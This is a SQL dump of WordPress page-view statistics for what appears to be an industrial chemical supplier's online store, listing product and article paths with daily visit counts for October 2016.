INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-10-11', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coating/', '2016-10-11', 1, 637); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epi-rez-5522-wy-55/', '2016-10-11', 1, 1035); 
INSERT INTO `wp_statistics_pages` VALUES ('/hfcc-npb-replacements/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 1124); 
INSERT INTO `wp_statistics_pages` VALUES ('/?cachebuster=3076071838', '2016-10-11', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/suprion/', '2016-10-11', 2, 1344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coating-mil-spec/', '2016-10-11', 1, 637); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-11', 2, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/suprion/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 1344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-246/', '2016-10-11', 2, 1088); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-246/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 1088); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-11', 3, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-fpg-182/', '2016-10-11', 1, 973); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-fpg-182/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 973); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/?preview_id=2474&preview_nonce=d26c47e659&post_format=standard&_thumbnail_id=2475&preview=true', '2016-10-11', 1, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-114c/', '2016-10-11', 1, 623); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-11', 2, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-407/', '2016-10-11', 1, 1111); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-ms-242n/', '2016-10-11', 3, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-ms-242n/?wc-ajax=get_refreshed_fragments', '2016-10-11', 2, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/', '2016-10-11', 1, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rubber-molding-release-agents/', '2016-10-11', 1, 419); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/', '2016-10-11', 2, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-462h/', '2016-10-11', 1, 732); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-10-11', 2, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/?cachebuster=2158278775', '2016-10-11', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-460h/', '2016-10-11', 1, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-460h/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/medical-chemicals/', '2016-10-11', 1, 1244); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal/', '2016-10-11', 1, 733); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-release-agents/', '2016-10-11', 1, 297); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 297); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/', '2016-10-11', 1, 310); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-release-agent/', '2016-10-11', 1, 400); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents-2/', '2016-10-11', 2, 425); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-470c/', '2016-10-11', 2, 735); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8900/', '2016-10-11', 1, 868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8900/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/', '2016-10-11', 2, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/', '2016-10-11', 2, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52/', '2016-10-11', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-472c/', '2016-10-11', 1, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/', '2016-10-11', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/pfpe-re-move-ms-250252/', '2016-10-11', 3, 1711); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-conformal-coatings/', '2016-10-11', 2, 735); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-10-11', 2, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381h/', '2016-10-11', 1, 1670); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64/', '2016-10-11', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/', '2016-10-11', 1, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-755l/', '2016-10-11', 1, 1690); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-755l/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 1690); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143aa/', '2016-10-11', 1, 579); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/', '2016-10-11', 1, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/', '2016-10-11', 1, 347); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/', '2016-10-11', 1, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tribosys-211x/', '2016-10-11', 2, 1637); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001f/', '2016-10-11', 1, 924); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001f/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 924); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8908/', '2016-10-11', 1, 881); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8908/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 881); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-203/', '2016-10-11', 1, 784); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a0/', '2016-10-11', 2, 1002); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/', '2016-10-11', 2, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-2a0/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 1002); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/cobra-duster/', '2016-10-11', 1, 1851); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/?wc-ajax=get_refreshed_fragments', '2016-10-11', 1, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agents/', '2016-10-11', 1, 2312); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-752u/', '2016-10-11', 1, 1834); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/', '2016-10-11', 1, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-12', 491, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-ms-242n/', '2016-10-12', 4, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-12', 134, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-12', 27, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/', '2016-10-12', 4, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/', '2016-10-12', 3, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-10-12', 3, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-10-12', 14, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-12', 22, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-12', 49, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-12', 76, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/about/', '2016-10-12', 47, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-12', 6, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-12', 5, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-12', 22, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-12', 63, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-12', 20, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-and-coatings/', '2016-10-12', 16, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-12', 45, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-12', 9, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/', '2016-10-12', 3, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/?wc-ajax=get_refreshed_fragments', '2016-10-12', 2, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-555557/', '2016-10-12', 2, 1384); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/suprion/', '2016-10-12', 2, 1344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/cobra-duster/', '2016-10-12', 2, 1851); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-12', 5, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/shieldsys-rfi-nickel-conductive-coating/', '2016-10-12', 4, 1722); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-12', 5, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-12', 11, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-12', 3, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-738/', '2016-10-12', 6, 1840); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-738/?wc-ajax=get_refreshed_fragments', '2016-10-12', 2, 1840); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-738', '2016-10-12', 1, 1840); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-12', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/h0805ab/', '2016-10-12', 3, 1693); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-755l/', '2016-10-12', 2, 1690); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-10-12', 2, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-12', 6, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-12', 9, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?wc-ajax=get_refreshed_fragments', '2016-10-12', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/', '2016-10-12', 3, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/', '2016-10-12', 4, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ks-1220/', '2016-10-12', 2, 2460); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-12', 18, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-560562/', '2016-10-12', 2, 1695); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-725727/', '2016-10-12', 1, 1697); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/', '2016-10-12', 1, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdx/', '2016-10-12', 1, 697); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdz/', '2016-10-12', 1, 696); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-12', 7, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3223/', '2016-10-12', 2, 1183); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/', '2016-10-12', 4, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/', '2016-10-12', 4, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/', '2016-10-12', 2, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-10-12', 4, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-12', 8, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/', '2016-10-12', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-12', 3, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/hfcc-npb-replacements/', '2016-10-12', 2, 1124); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-12', 5, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing/', '2016-10-12', 2, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/', '2016-10-12', 2, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/a,c.type=', '2016-10-12', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-bearing-lubrication/', '2016-10-12', 2, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness/', '2016-10-12', 1, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants/', '2016-10-12', 3, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/', '2016-10-12', 2, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-xht-takes-heat/', '2016-10-12', 2, 2375); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-10-12', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/', '2016-10-12', 2, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-10-12', 2, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/view/', '2016-10-12', 1, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52/', '2016-10-12', 3, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/', '2016-10-12', 3, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88/', '2016-10-12', 3, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=2474', '2016-10-12', 1, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-252n/', '2016-10-12', 1, 622); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/radical-initiators/', '2016-10-12', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=1128', '2016-10-12', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=1525', '2016-10-12', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=1124', '2016-10-12', 1, 1124); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/', '2016-10-12', 9, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rust-inhibitor/', '2016-10-12', 2, 1724); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/penetrating-oil/', '2016-10-12', 1, 1729); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/spray-trigger/', '2016-10-12', 1, 1852); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=1601', '2016-10-12', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=1135', '2016-10-12', 1, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/sion/', '2016-10-12', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=1121', '2016-10-12', 1, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-12', 2, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/', '2016-10-12', 2, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-224/', '2016-10-12', 1, 847); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/a,c.type=/', '2016-10-12', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-214/', '2016-10-12', 1, 821); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xp-2a4/', '2016-10-12', 2, 1014); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=2503', '2016-10-12', 1, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/', '2016-10-12', 2, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-225/', '2016-10-12', 1, 848); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xp-2a5/', '2016-10-12', 1, 1012); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=2450', '2016-10-12', 1, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/', '2016-10-12', 1, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-202/', '2016-10-12', 1, 783); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-10-12', 2, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/', '2016-10-12', 1, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-283ac/', '2016-10-12', 1, 655); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-xht-takes-heat/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 2375); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/', '2016-10-12', 1, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-fpg-028/', '2016-10-12', 1, 984); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-fpg-028/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 984); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-111-epoxy-stripping-agent/', '2016-10-12', 13, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/', '2016-10-12', 2, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/?wc-ajax=get_refreshed_fragments', '2016-10-12', 2, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/', '2016-10-12', 1, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/', '2016-10-12', 1, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/', '2016-10-12', 4, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-12', 4, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-12', 3, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/?wc-ajax=get_refreshed_fragments', '2016-10-12', 3, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-10-12', 3, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-10-12', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-111-epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-12', 3, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation/', '2016-10-12', 3, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-valve-lubricants/', '2016-10-12', 1, 2305); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding/', '2016-10-12', 1, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-538/', '2016-10-12', 1, 1836); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry', '2016-10-12', 4, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-10-12', 3, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/', '2016-10-12', 2, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-12', 4, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-12', 5, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-462h/', '2016-10-12', 4, 732); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/', '2016-10-12', 3, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8908/', '2016-10-12', 1, 881); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/', '2016-10-12', 5, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3274/', '2016-10-12', 1, 1191); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3274/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 1191); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-61/', '2016-10-12', 2, 1069); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-61/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 1069); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox', '2016-10-12', 2, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-61/heloxy-61/', '2016-10-12', 1, 1073); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/?wc-ajax=get_refreshed_fragments', '2016-10-12', 3, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/', '2016-10-12', 10, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-280ac/', '2016-10-12', 1, 651); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-280ac/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 651); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-12', 4, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-201/', '2016-10-12', 1, 769); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-201/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 769); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/', '2016-10-12', 4, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-153bn/', '2016-10-12', 1, 308); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agents/', '2016-10-12', 2, 2312); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/universal-ptfe-release-agent/', '2016-10-12', 1, 305); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3140/', '2016-10-12', 3, 1868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coatings/', '2016-10-12', 3, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/?wc-ajax=get_refreshed_fragments', '2016-10-12', 9, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-283ad/', '2016-10-12', 2, 656); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-283ad/?wc-ajax=get_refreshed_fragments', '2016-10-12', 2, 656); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-release-agent/', '2016-10-12', 2, 400); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents-2/', '2016-10-12', 3, 425); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/mold-release-agent/', '2016-10-12', 1, 423); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rubber-molding-release-agents/', '2016-10-12', 3, 419); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-830/', '2016-10-12', 1, 882); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-71/', '2016-10-12', 1, 1230); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-71/?wc-ajax=get_refreshed_fragments', '2016-10-12', 1, 1230); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/', '2016-10-12', 2, 2552); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-prepare-bearings/', '2016-10-12', 1, 2507); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agents/', '2016-10-12', 2, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/composite-mold-release-agent/', '2016-10-12', 3, 290); 
